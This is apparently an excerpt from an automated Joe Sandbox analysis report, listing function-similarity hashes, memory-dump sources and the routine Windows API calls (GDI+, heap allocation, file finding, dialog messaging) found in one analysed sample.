                                                                          • API String ID: 1175261203-0
                                                                          • Opcode ID: e040b852b77b58c4cfa03076b18cdda538915ff4f7e1194d39f35803637cd5f0
                                                                          • Instruction ID: 82641d945e7f1dc232842ffa22e65ca42466512f480b1061e7f8ba849fafb0b3
                                                                          • Opcode Fuzzy Hash: e040b852b77b58c4cfa03076b18cdda538915ff4f7e1194d39f35803637cd5f0
                                                                          • Instruction Fuzzy Hash: D8E048B690011C6BDB11A794DC45FDA77ACEF093E2F0400657645D2044DA74DAC4DFF0
                                                                          APIs
                                                                          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F1A3DA
                                                                          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00F1A3E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: BitmapCreateFromGdipStream
                                                                          • String ID:
                                                                          • API String ID: 1918208029-0
                                                                          • Opcode ID: 50ffab6009b0d24bfce6870046e721f8f3ef5d3a07fc7218dde1ddba0ef83442
                                                                          • Instruction ID: 5612759940c789ec47a5bdbfc9bc795d20b715559a8da1b23ef8567d25ee29b1
                                                                          • Opcode Fuzzy Hash: 50ffab6009b0d24bfce6870046e721f8f3ef5d3a07fc7218dde1ddba0ef83442
                                                                          • Instruction Fuzzy Hash: 21E0ED71905218EBCB10DF55C9417D9BBE8EB04364F10805AA85693201E374BE44FB91
                                                                          APIs
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F22BAA
                                                                          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00F22BB5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                          • String ID:
                                                                          • API String ID: 1660781231-0
                                                                          • Opcode ID: 84b718c28d86c88528379fa8fdd592f29e9d68c35ef0e4d2702c5ce906724bd9
                                                                          • Instruction ID: 6995c136db31b8513c9138d81448ad8d3c0a9d9d79647ebd82defce7dcd536c9
                                                                          • Opcode Fuzzy Hash: 84b718c28d86c88528379fa8fdd592f29e9d68c35ef0e4d2702c5ce906724bd9
                                                                          • Instruction Fuzzy Hash: 51D02275998334384CE42EB03C1764D3386BEC1B717E0039AF830998C1EE1CC040B022
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3351165006-0
                                                                          • Opcode ID: 789997610b21aba33df8a69dedbeafa80957c9de775c3b2b7a078c79e8eab577
                                                                          • Instruction ID: 6d4e9f03f8c7aa60409047e6d0d482e2551a3deee4a5c60cbffee9eb4f9addf5
                                                                          • Opcode Fuzzy Hash: 789997610b21aba33df8a69dedbeafa80957c9de775c3b2b7a078c79e8eab577
                                                                          • Instruction Fuzzy Hash: 0CC0123285C228BECB010BB4DC09C2BBBA8ABA7312F04C908F0B5C0060C238C110FB11
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 7ebc8419ea007270c0e5bbe19aec7d881ae2645772c1bbb6cde5b32b33f38978
                                                                          • Instruction ID: 4720163b86b43193eafdaf325179b89807209d2898ae7fa7b39bfbb644202af6
                                                                          • Opcode Fuzzy Hash: 7ebc8419ea007270c0e5bbe19aec7d881ae2645772c1bbb6cde5b32b33f38978
                                                                          • Instruction Fuzzy Hash: BBC1BF70E002549FEF29DF68C884BA97BA5BF45320F0841B9EC469B2D2DB349944FB61
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: d5124253043642d7af88726c76e3a65db055297040c9f93093bbabc52595b769
                                                                          • Instruction ID: 8e85daf2c106fabe6490199ae95570615bbf99ec55032a1daec64f197fa3e33e
                                                                          • Opcode Fuzzy Hash: d5124253043642d7af88726c76e3a65db055297040c9f93093bbabc52595b769
                                                                          • Instruction Fuzzy Hash: 3671D371500B859EDB35DB70CC55AE7F7E9AF14300F40492EE6AB87282DA366688FF11
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F08289
                                                                            • Part of subcall function 00F013DC: __EH_prolog.LIBCMT ref: 00F013E1
                                                                            • Part of subcall function 00F0A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A598
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog$CloseFind
                                                                          • String ID:
                                                                          • API String ID: 2506663941-0
                                                                          • Opcode ID: f791d810880c7b742aacb4b3d2486728a80aa5aef8e7e119eda93e5ed3c6347f
                                                                          • Instruction ID: ea9964efd1c06d7ea4151dc80b4be873db0298e042d716720f3ccdc14f7b1adb
                                                                          • Opcode Fuzzy Hash: f791d810880c7b742aacb4b3d2486728a80aa5aef8e7e119eda93e5ed3c6347f
                                                                          • Instruction Fuzzy Hash: 2C41C471D446589ADB20DBA0CC55AEAB7B8BF40344F4404EAE58A970C3EB795EC5FB10
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F013E1
                                                                            • Part of subcall function 00F05E37: __EH_prolog.LIBCMT ref: 00F05E3C
                                                                            • Part of subcall function 00F0CE40: __EH_prolog.LIBCMT ref: 00F0CE45
                                                                            • Part of subcall function 00F0B505: __EH_prolog.LIBCMT ref: 00F0B50A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: a61d294448c23fbf9c190e06e6cc36eb529737506b0ab5b2ba34c7daa273ba18
                                                                          • Instruction ID: 530f2e8f38a6feb71237e0640ed14388444e19515431a6b7b84182af1b9cf5ec
                                                                          • Opcode Fuzzy Hash: a61d294448c23fbf9c190e06e6cc36eb529737506b0ab5b2ba34c7daa273ba18
                                                                          • Instruction Fuzzy Hash: 614149B0905B40DEE724CF398885AE6FBE5BF19310F544A2ED5FE83282CB756654EB10
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F013E1
                                                                            • Part of subcall function 00F05E37: __EH_prolog.LIBCMT ref: 00F05E3C
                                                                            • Part of subcall function 00F0CE40: __EH_prolog.LIBCMT ref: 00F0CE45
                                                                            • Part of subcall function 00F0B505: __EH_prolog.LIBCMT ref: 00F0B50A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: b522aa9395654821d2465040a9ef5b186b8e436e913f7e57ddd6c9bb5194b6d5
                                                                          • Instruction ID: 342ceb85b110ee5bd7f7bf72e6b6a867e976a60e28660bf15adb0279db2b9d5b
                                                                          • Opcode Fuzzy Hash: b522aa9395654821d2465040a9ef5b186b8e436e913f7e57ddd6c9bb5194b6d5
                                                                          • Instruction Fuzzy Hash: BA4167B0905B409EE724CF398885AE6FBE5BF19310F544A2ED5FE83282CB752654EB10
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F1B098
                                                                            • Part of subcall function 00F013DC: __EH_prolog.LIBCMT ref: 00F013E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: d0975b6bf51cbb07411406ded4ba264334c8ad7c7eefb481e3be5b5b1185aa43
                                                                          • Instruction ID: 5974935e463e731e78ec8a53d3d5e71dcd9f87854a830cbb89ff7a67be5f2334
                                                                          • Opcode Fuzzy Hash: d0975b6bf51cbb07411406ded4ba264334c8ad7c7eefb481e3be5b5b1185aa43
                                                                          • Instruction Fuzzy Hash: A1316D75C04249EACF15DF64DC519EEB7B4AF09300F10449EE809B7282D739AE44EBA1
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F2ACF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID:
                                                                          • API String ID: 190572456-0
                                                                          • Opcode ID: 5bd7a1e1e027f15addc866b37475889c4ea5c53f0b5118f7d96e03fae7a0e963
                                                                          • Instruction ID: 24db7a63f9a2ce949889ab868024a36bca9cdd9ae792bbda5bb9b116d4e4bae2
                                                                          • Opcode Fuzzy Hash: 5bd7a1e1e027f15addc866b37475889c4ea5c53f0b5118f7d96e03fae7a0e963
                                                                          • Instruction Fuzzy Hash: AB11A333A416399F9B269E2CFC4095A7396AB843707564221ED25EB294D734EC01A7D2
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          • Opcode ID: 410dbec79faabd1a0f414e9478a032a1aa19dd8ae9f8370fa80c4ea85c2803fa
                                                                          • Instruction ID: e5f6a5ef602da7205bd6a5cdd41bb39ecd1694a4f338b7b9a39540bf4aee17a2
                                                                          • Opcode Fuzzy Hash: 410dbec79faabd1a0f414e9478a032a1aa19dd8ae9f8370fa80c4ea85c2803fa
                                                                          • Instruction Fuzzy Hash: 40016533D00568ABCF26AFA8CD819DEB735BF88750F014515E816B7192DA788D14F6A0
                                                                          APIs
                                                                            • Part of subcall function 00F2B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F29813,00000001,00000364,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F2B177
                                                                          • _free.LIBCMT ref: 00F2C4E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                          • Instruction ID: 5f45342e9e68eba12af70370066bb084083af25027cb595b3681a3c0615481cf
                                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                          • Instruction Fuzzy Hash: C70126726003156BE331DE65EC81A6AFBE8EB89370F65091DE58483281EA30A905C764
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F29813,00000001,00000364,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F2B177
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: dd59ebd111ec4e6b1d5571c7a8de1b8be01d77b2207146af2b10b1f7e6224c3a
                                                                          • Instruction ID: 795a87be13def2204a1cc31b1ccbcc5addc54e989b179dc5cd1d0a5dd4da533a
                                                                          • Opcode Fuzzy Hash: dd59ebd111ec4e6b1d5571c7a8de1b8be01d77b2207146af2b10b1f7e6224c3a
                                                                          • Instruction Fuzzy Hash: 27F0893294953577EB615B22BC15B5F7758AF41770B18C111FC18DB190CB74DD21B6E0
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00F23C3F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID:
                                                                          • API String ID: 190572456-0
                                                                          • Opcode ID: d2762230f5f1ccc7a43339168a4bf133d6c829278d91810dbf2d65de597f7a68
                                                                          • Instruction ID: 33bbdb7df84649ecd643b7b689daf3792c27c190195e6db5e1fd59f50057424d
                                                                          • Opcode Fuzzy Hash: d2762230f5f1ccc7a43339168a4bf133d6c829278d91810dbf2d65de597f7a68
                                                                          • Instruction Fuzzy Hash: 7EF0A07264022A9F8F158EA8FC00A9A77E9EF41B347104124FA15E71A0DB35EA20E790
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2CA2C,00000000,?,00F26CBE,?,00000008,?,00F291E0,?,?,?), ref: 00F28E38
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00F05AC2
                                                                            • Part of subcall function 00F0B505: __EH_prolog.LIBCMT ref: 00F0B50A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog
                                                                          • String ID:
                                                                          • API String ID: 3519838083-0
                                                                          APIs
                                                                            • Part of subcall function 00F0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6C4
                                                                            • Part of subcall function 00F0A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6F2
                                                                            • Part of subcall function 00F0A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F0A592,000000FF,?,?), ref: 00F0A6FE
                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A598
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1464966427-0
                                                                          APIs
                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00F10E3D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ExecutionStateThread
                                                                          • String ID:
                                                                          • API String ID: 2211380416-0
                                                                          APIs
                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00F1A62C
                                                                            • Part of subcall function 00F1A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F1A3DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                          • String ID:
                                                                          • API String ID: 1915507550-0
                                                                          APIs
                                                                          • DloadProtectSection.DELAYIMP ref: 00F1E5E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DloadProtectSection
                                                                          • String ID:
                                                                          • API String ID: 2203082970-0
                                                                          APIs
                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00F11B3E), ref: 00F1DD92
                                                                            • Part of subcall function 00F1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1B579
                                                                            • Part of subcall function 00F1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1B58A
                                                                            • Part of subcall function 00F1B568: IsDialogMessageW.USER32(0001045C,?), ref: 00F1B59E
                                                                            • Part of subcall function 00F1B568: TranslateMessage.USER32(?), ref: 00F1B5AC
                                                                            • Part of subcall function 00F1B568: DispatchMessageW.USER32(?), ref: 00F1B5B6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                          • String ID:
